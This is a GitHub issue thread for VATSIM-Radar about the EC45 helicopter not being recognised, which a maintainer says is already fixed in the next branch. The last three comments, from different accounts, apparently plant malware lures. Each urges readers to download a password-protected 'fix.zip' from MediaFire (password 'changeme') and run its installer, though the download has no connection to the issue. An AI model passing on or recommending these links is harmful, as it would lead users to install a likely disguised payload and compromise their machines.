### ISSUE TITLE
EC45 not recognized as helicopter

### ISSUE THREAD

**Issue by malanquerido** [VATSIM-Radar/vatsim-radar#309]
### Your Vatsim CID

1042467

### What aircraft icon(s) do you suggest to add

EC45

### Model matching

EC35

### Additional info

![screenshot1](https://github.com/user-attachments/assets/37124880-bd61-459d-99bc-5d08e06bb89f)

### Validation

- [X] I have searched for other requests and didn't found any alike

**Comment by DotWallop** [comment]
Already implemented in next-branch. 🥳

Coming to a radar near you soon(TM)

**Comment by malanquerido** [comment]
Sorry, not found initially - but now when searching for "helicopter": https://github.com/VATSIM-Radar/vatsim-radar/pull/238

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
